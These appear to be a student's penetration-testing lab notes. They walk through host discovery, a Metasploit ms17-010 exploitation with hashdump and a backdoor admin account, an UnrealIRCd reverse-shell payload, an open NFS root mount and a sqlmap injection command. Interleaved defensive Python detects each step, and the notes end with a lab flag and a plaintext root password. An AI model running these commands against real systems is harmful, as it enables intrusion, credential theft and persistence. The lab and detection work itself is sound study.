#InvestigationMethodology #LinuxClient
We connected to the professor's modem. We found the password: 12345678
`dhclient -v`
`ifconfig` to see the IP
First thing to do:
`apt install nast`
`nast -m` : uses ARP to list the machines on the same subnet
`netdiscover` : lists all of the subnetworks that could exist on the network
`netdiscover -i eth0 -r 192.168.254.0/24` : to find the address of the device we'll exploit, narrow the search to one subnet, and get a more detailed list
![[Pasted image 20240409170143.png]]
`nmap -sT -vv -F [network address]/24` - network scanning tool: used for network exploration, host discovery, and security auditing
`iptables -A INPUT -j LOG` - Linux kernel (netfilter) rule: logs every incoming packet to the kernel log, so on the target side the scans below leave a trace
`nmap -sT -v -Pn -O -T5 -A 192.168.254.144/24` - to scan the open ports on the PC we'll exploit. Lists hosts / MAC addresses / IP addresses / security measures of the hosts on a network: PCs, phones, routers, etc.
`nmap -sT -vv -F 192.168.255.0/24` - we do it with the network address to scan the machines
`nmap -sT -vv -p- -T5 -A 192.168.255.127` - we scan .127 because it had weird ports like 10000, so we scan all the ports on it
![[Pasted image 20240410144446.png]]
![[Pasted image 20240410100352.png]]
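Added example, not from the course notes: the `iptables -A INPUT -j LOG` rule above writes one kernel-log line per incoming packet, so the nmap sweeps show up on the target as a single source hitting many different `DPT=` values within a few seconds. The Python below parses lines in that format and reports any source that touches at least `min_ports` distinct TCP ports inside a `window_seconds` window. The log lines are constructed to match the iptables LOG layout rather than captured from the lab, and both thresholds are assumptions to tune per network.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample of what `iptables -A INPUT -j LOG` produces in the kernel log
# (syslog prefix, then netfilter's key=value fields). Not captured from the lab.
SAMPLE_LOG = """\
Apr 10 14:44:46 target kernel: [ 812.10] IN=eth0 OUT= MAC=08:00:27:aa:bb:cc:08:00:27:11:22:33:08:00 SRC=192.168.254.123 DST=192.168.254.144 LEN=44 PROTO=TCP SPT=41002 DPT=21 WINDOW=1024 SYN
Apr 10 14:44:46 target kernel: [ 812.11] IN=eth0 OUT= SRC=192.168.254.123 DST=192.168.254.144 LEN=44 PROTO=TCP SPT=41002 DPT=22 WINDOW=1024 SYN
Apr 10 14:44:46 target kernel: [ 812.12] IN=eth0 OUT= SRC=192.168.254.123 DST=192.168.254.144 LEN=44 PROTO=TCP SPT=41002 DPT=23 WINDOW=1024 SYN
Apr 10 14:44:47 target kernel: [ 813.01] IN=eth0 OUT= SRC=192.168.254.123 DST=192.168.254.144 LEN=44 PROTO=TCP SPT=41002 DPT=80 WINDOW=1024 SYN
Apr 10 14:44:47 target kernel: [ 813.02] IN=eth0 OUT= SRC=192.168.254.123 DST=192.168.254.144 LEN=44 PROTO=TCP SPT=41002 DPT=139 WINDOW=1024 SYN
Apr 10 14:44:48 target kernel: [ 814.03] IN=eth0 OUT= SRC=192.168.254.123 DST=192.168.254.144 LEN=44 PROTO=TCP SPT=41002 DPT=445 WINDOW=1024 SYN
Apr 10 14:44:48 target kernel: [ 814.04] IN=eth0 OUT= SRC=192.168.254.123 DST=192.168.254.144 LEN=44 PROTO=TCP SPT=41002 DPT=3389 WINDOW=1024 SYN
Apr 10 14:44:48 target kernel: [ 814.05] IN=eth0 OUT= SRC=192.168.254.123 DST=192.168.254.144 LEN=84 PROTO=ICMP TYPE=8 CODE=0
Apr 10 14:44:50 target kernel: [ 816.00] IN=eth0 OUT= SRC=192.168.254.10 DST=192.168.254.144 LEN=60 PROTO=TCP SPT=50112 DPT=445 WINDOW=29200 SYN
Apr 10 14:45:10 target kernel: [ 836.00] IN=eth0 OUT= SRC=192.168.254.10 DST=192.168.254.144 LEN=60 PROTO=TCP SPT=50118 DPT=445 WINDOW=29200 SYN
Apr 10 14:45:30 target kernel: [ 856.00] IN=eth0 OUT= SRC=192.168.254.10 DST=192.168.254.144 LEN=60 PROTO=UDP SPT=5353 DPT=5353 LEN=40
"""

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ kernel: (?P<rest>.*)$"
)


def parse_line(line):
    """Return {ts, src, dst, dpt} for a logged TCP packet, or None for anything else."""
    m = LINE_RE.match(line)
    if not m:
        return None
    fields = dict(re.findall(r"(\w+)=(\S*)", m.group("rest")))
    if fields.get("PROTO") != "TCP" or "DPT" not in fields or "SRC" not in fields:
        return None
    # syslog timestamps carry no year; strptime defaults to 1900, which is fine for deltas
    ts = datetime.strptime(" ".join(m.group("ts").split()), "%b %d %H:%M:%S")
    return {"ts": ts, "src": fields["SRC"], "dst": fields["DST"], "dpt": int(fields["DPT"])}


def detect_scans(log_text, window_seconds=10, min_ports=5):
    """Map source IP -> largest number of distinct TCP ports it hit inside one window.

    Only sources reaching at least min_ports distinct ports are reported.
    window_seconds and min_ports are assumed thresholds; tune them per network.
    """
    by_src = defaultdict(list)
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev:
            by_src[ev["src"]].append(ev)

    alerts = {}
    for src, evs in by_src.items():
        evs.sort(key=lambda e: e["ts"])
        start = 0
        for end, ev in enumerate(evs):
            # slide the window start forward until the span fits in window_seconds
            while (ev["ts"] - evs[start]["ts"]).total_seconds() > window_seconds:
                start += 1
            ports = {e["dpt"] for e in evs[start:end + 1]}
            if len(ports) >= min_ports:
                alerts[src] = max(alerts.get(src, 0), len(ports))
    return alerts


if __name__ == "__main__":
    for src, n in detect_scans(SAMPLE_LOG).items():
        print(f"possible port scan from {src}: {n} distinct ports within 10s")
```

The benign host that retries SMB (port 445) three times never trips the rule, because the count is of distinct destination ports, not packets; a `-p-` full-port scan like the one in the notes would produce thousands of distinct ports from one source in seconds.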
Metasploit
Finding vulnerabilities on a system and connecting in
msf service : to explore vulnerabilities on the system
`msfdb init` : to create the database
`msfconsole` : to start the console
when inside the `msf6 >` prompt:
- we can search for anything
- like `search microsoft`
- or `search ms17-010`
- then we do `use 1`
- then `show options`
![[Pasted image 20240410103331.png]]
`set rhosts 192.168.254.123` (the IP address of the PC we're attacking) : to attack the Windows PC on the network with this IP address
- could be `rhost` depending on the module
`run` to run it
now we have changed the IP address of the host
![[Pasted image 20240410104258.png]]
meterpreter helps us connect to the hacked machine on the network.
- actually, the machine connects back to us; it's like SSH. We can run commands on the machine.
- we hacked the Windows machine !!
`getsystem` to get SYSTEM rights
`getprivs` to enable and list the privileges we have
`hashdump`
![[Pasted image 20240410113415.png]]
`shell` to connect to the shell / cmd of the hacked PC
![[Pasted image 20240410105037.png]]
we created a user and put the user in the admins group through the shell as an exercise.
![[Pasted image 20240410115850.png]]
A. Reconnaissance
1. `ipconfig` or `ifconfig` : we see IP / DNS / gateway / network. DNS is usually provided by AD (Active Directory)
2. `arp -a` : we see 2 commands
   1. `nast`
   2. `netdiscover`
3. `nmap` - to scan
4. `nessus` or `openvas` - to scan for vulnerabilities
   1. we found ms17-010
B. Exploit / Weaponization
1. metasploit with `msfconsole`
   1. `search ms17-010`
   2. `use 0`
   3. `set rhosts [ip]`
   4. `run` or `exploit`
   - meterpreter is the intermediary between the shell and the exploited machine
C. Post exploitation
- `meterpreter >`
  - `getsystem`
  - `getprivs`
  - `hashdump` - john the ripper
  - hashcat
  - `sysinfo` - windows
  - `shell`
    - `net user [..] /add`
    - `net localgroup [..] /add`
- linux server shell
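Added example, not from the course notes: the post-exploitation steps above (`getsystem`, then `net user /add` and `net localgroup /add` from the shell, as in the earlier exercise) leave a recognisable pair of Windows Security events: 4720 (user account created) followed shortly by 4732 (member added to a security-enabled local group) for the built-in Administrators group, with the change made as SYSTEM instead of by a named administrator. The Python below correlates such events. The event records are constructed and reduced to this example's own field names (`target_user`, `member_name`, `group_sid`), not the raw event XML; the one-hour window is an assumption.

```python
from datetime import datetime, timedelta

# Well-known SID of the built-in local Administrators group (same on every Windows host)
ADMINISTRATORS_SID = "S-1-5-32-544"

# Constructed Security-log events reduced to the fields this check needs:
# 4720 = user account created, 4732 = member added to a security-enabled local group.
# Field names are this example's own, not the raw event schema. Not real lab data.
SAMPLE_EVENTS = [
    {"time": "2024-04-10T11:58:02", "id": 4720, "subject": "NT AUTHORITY\\SYSTEM",
     "target_user": "labuser"},
    {"time": "2024-04-10T11:58:20", "id": 4732, "subject": "NT AUTHORITY\\SYSTEM",
     "member_name": "WIN-PC\\labuser", "group_sid": "S-1-5-32-544"},
    # benign: account created days earlier, later given RDP access by a named admin
    {"time": "2024-04-07T09:00:00", "id": 4720, "subject": "CORP\\helpdesk",
     "target_user": "alice"},
    {"time": "2024-04-10T10:15:00", "id": 4732, "subject": "CORP\\helpdesk",
     "member_name": "WIN-PC\\alice", "group_sid": "S-1-5-32-555"},
    # benign: old account promoted to Administrators by a named admin
    {"time": "2024-04-10T10:20:00", "id": 4732, "subject": "CORP\\helpdesk",
     "member_name": "WIN-PC\\alice", "group_sid": "S-1-5-32-544"},
]


def find_suspicious_admin_adds(events, window=timedelta(hours=1)):
    """Return one finding per Administrators addition that matches the
    create-then-promote pattern: the account was created less than `window`
    earlier, and/or the change was made as SYSTEM rather than by a named admin."""
    created = {}        # account name (lower-case) -> creation time
    findings = []
    for ev in sorted(events, key=lambda e: e["time"]):
        t = datetime.fromisoformat(ev["time"])
        if ev["id"] == 4720:
            created[ev["target_user"].lower()] = t
            continue
        if ev["id"] != 4732 or ev["group_sid"] != ADMINISTRATORS_SID:
            continue
        account = ev["member_name"].split("\\")[-1].lower()
        reasons, age = [], None
        if account in created:
            age = int((t - created[account]).total_seconds())
            if t - created[account] <= window:
                reasons.append(f"added to Administrators {age}s after creation")
        if ev["subject"].upper().endswith("\\SYSTEM"):
            reasons.append("group change performed as SYSTEM, not by a named admin")
        if reasons:
            findings.append({"account": account, "time": ev["time"],
                             "seconds_since_creation": age, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in find_suspicious_admin_adds(SAMPLE_EVENTS):
        print(f"{f['time']} {f['account']}: " + "; ".join(f["reasons"]))
```

The check keys on the group SID rather than its display name because the name is localised while `S-1-5-32-544` is the same on every Windows host; the same idea extends to 4728/4756 for domain groups.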
the other way to log in to the Windows shell: without metasploit
- `netdiscover -i eth0 -r 192.168.254.0/24` - we do netdiscover to find the IP addresses on the subnet, using the IP address of the subnet
- `nmap -sT -v -Pn -O -T5 -A 192.168.254.144/24` - we do nmap on the client's IP address
- `telnet 192.168.254.144` - we don't need to log in, but we see that there's an opening in telnet as well
- `rlogin -l root 192.168.254.144` - to access root on the client
on linux ; exploit of RAM
we do `searchsploit` (to search the local Exploit-DB copy, i.e. the list of all public exploits) from the bash shell, or `search` from msfconsole (to search only the modules inside msfconsole, the files ending in .rb) to find the vulnerabilities
i go to `bash -i` to be able to run the shell in a Linux terminal after doing `run` in msfconsole
`linux_x86/local/46249.py` - wouldn't work because it's local
`linux/remote/16850.rb` - we'll search this through msfconsole: `search yaSSL`
0.9.8c-1
![[Pasted image 20240410164748.png]]
alienvault ossim
- path of all exploits : /usr/share/exploitdb/exploits
- to set a payload inside msfconsole in case we face the error "no payload defined" :
`set payload cmd/unix/reverse_perl` - I might also need to set LHOST, entering my own IP address
what to search for, to find something that gives access to root@ on the client we're trying to hack: backdoor rse kal ![[Pasted image 20240410170919.png]]
- i used unrealircd to find an exploit through msfconsole
- `use 0`
- `options`
- `set rhosts 192.168.254.144` (IP of the exploited PC)
- `set lhost 192.168.254.123` (my IP)
- `set payload cmd/unix/reverse_perl` (https://docs.rapid7.com/metasploit/working-with-payloads/)
- `run`
then i'm in
i do `id` to understand which user account I have ;
![[Pasted image 20240410171718.png]]
but `bash -i` to be in the shell as the user account (root in this case)
![[Pasted image 20240410171810.png]]
RECAP
nmap target
port / protocol / version : 22/ftp ssh 4.7p1
`searchsploit ssh 4.7p1 linux`
rb : (metasploit) > msfconsole
pl : perl (script.pl)
py : python (script.py)
sh : bash (script.sh)
c : compile with `gcc -o executable exploit.c`
45233.py
to access through NFS and mount:
with netdiscover we find the IP of the PC we'll be hacking on the network.
`mount -t nfs 192.168.254.153:/ /mnt/`
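Added example, not from the course notes: the mount above only works because the server's `/etc/exports` hands out its root directory to any client, and if `no_root_squash` is set the client's root keeps uid 0 on the server's files. The Python below parses an `/etc/exports` file and lists the weak settings an administrator should look for (export to `*`, `no_root_squash`, exporting `/`, `insecure`). The exports file is a constructed sample whose first line mirrors that weak setup; it is not the lab machine's file.

```python
import re

# Constructed /etc/exports, the server-side file that decides who may mount what.
# The first line reproduces the weak setup the lab mount depends on. Not a real server's file.
SAMPLE_EXPORTS = """\
# constructed sample, not a real server's configuration
/                *(rw,no_root_squash)
/srv/share       192.168.254.0/24(rw,sync,root_squash)
/home/backup     192.168.254.10(ro,sync)
/pub             *(ro,all_squash)
"""

# one client token: optional host part, optional "(opt1,opt2)" part
TOKEN_RE = re.compile(r"^([^()]*)(?:\((.*)\))?$")


def parse_exports(text):
    """Return one {path, host, opts} entry per (path, client) pair in an exports file."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and blank lines
        if not line:
            continue
        parts = line.split()
        path, tokens = parts[0], parts[1:]
        if not tokens:
            tokens = ["*"]                        # a bare path is exported to everyone
        for tok in tokens:
            m = TOKEN_RE.match(tok)
            host = m.group(1) or "*"              # "(ro)" with no host also means everyone
            opts = {o for o in (m.group(2) or "").split(",") if o}
            entries.append({"path": path, "host": host, "opts": opts})
    return entries


def audit_exports(text):
    """Return one finding per weak setting found in the exports file."""
    findings = []
    for e in parse_exports(text):
        problems = []
        if e["host"] == "*":
            problems.append("exported to every host")
        if "no_root_squash" in e["opts"]:
            problems.append("remote root keeps uid 0 on the server")
        if e["path"] == "/":
            problems.append("whole filesystem is exported")
        if "insecure" in e["opts"]:
            problems.append("mounts from unprivileged client ports are accepted")
        for p in problems:
            findings.append({"path": e["path"], "host": e["host"], "problem": p})
    return findings


if __name__ == "__main__":
    for f in audit_exports(SAMPLE_EXPORTS):
        print(f"{f['path']} -> {f['host']}: {f['problem']}")
```

The second and third sample lines show the shape a restricted export takes: a specific subnet or host, `root_squash` (the default, but worth stating), and read-only where writes are not needed.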
Last exercise
to search with sqlmap :
`sqlmap -u "https://192.168.255.127:10000" ' or 1=1 --' --forms --level=3 --risk=3`
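Added example, not from the course notes: on the server side, a run like the sqlmap command above shows up in the web access log as requests whose parameters decode to `' or 1=1 --` and, unless the User-Agent was changed, a User-Agent that names sqlmap. The Python below scores Apache-style access log lines on those indicators and returns the ones over a threshold. The log lines, the User-Agent string and the indicator weights are constructed for this example, not taken from the lab server.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache-style access log lines (combined format). Not from the lab server.
SAMPLE_ACCESS_LOG = """\
192.168.254.123 - - [24/May/2024:16:20:01 +0200] "POST /login HTTP/1.1" 200 512 "-" "sqlmap/1.7 (https://sqlmap.org)"
192.168.254.123 - - [24/May/2024:16:20:02 +0200] "GET /search?q=%27%20or%201%3D1%20--%20 HTTP/1.1" 200 9812 "-" "Mozilla/5.0"
192.168.254.10 - - [24/May/2024:16:21:00 +0200] "GET /search?q=firewall+rules HTTP/1.1" 200 2210 "-" "Mozilla/5.0"
192.168.254.10 - - [24/May/2024:16:21:05 +0200] "GET /docs/o%27reilly.html HTTP/1.1" 200 3300 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Each indicator: (name, weight, regex run on the URL-decoded request path).
# Weights are this example's assumption; tune against your own traffic.
PATH_INDICATORS = [
    ("tautology", 2, re.compile(r"\bor\b\s+(\d+)\s*=\s*\1\b", re.I)),  # or 1=1
    ("quote_then_boolean", 1, re.compile(r"'\s*(or|and)\b", re.I)),      # ' or ...
    ("quote_then_comment", 1, re.compile(r"'.*?(--|/\*|#)")),            # ' ... --
]


def score_request(path, user_agent):
    """Return (score, indicator names) for one request."""
    decoded = unquote_plus(path)                  # payloads arrive percent-encoded
    hits = [name for name, _w, rx in PATH_INDICATORS if rx.search(decoded)]
    score = sum(w for name, w, _rx in PATH_INDICATORS if name in hits)
    if "sqlmap" in user_agent.lower():            # sqlmap's default User-Agent names itself
        hits.append("scanner_user_agent")
        score += 3
    return score, hits


def detect_sqli(log_text, threshold=2):
    """Return the log entries whose score reaches the threshold."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        score, hits = score_request(m.group("path"), m.group("ua"))
        if score >= threshold:
            findings.append({"ip": m.group("ip"), "path": unquote_plus(m.group("path")),
                             "score": score, "indicators": hits})
    return findings


if __name__ == "__main__":
    for f in detect_sqli(SAMPLE_ACCESS_LOG):
        print(f"{f['ip']} score={f['score']} {f['indicators']} {f['path']}")
```

The apostrophe in `/docs/o'reilly.html` scores zero because a quote alone is not evidence; only a quote followed by a boolean keyword or a comment marker counts. POST bodies (the `--forms` case) are not in a standard access log, so catching those needs application-level logging or a WAF.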
i open a port on Kali: ![[Pasted image 20240524162700.png]]
to connect from bash to my Kali machine: ![[Pasted image 20240524162641.png]]
in the user.txt file : 3mp!r3{You_Manage_To_Break_To_My_Secure_Access}
root password : Ts&4&YurgtRX(=~h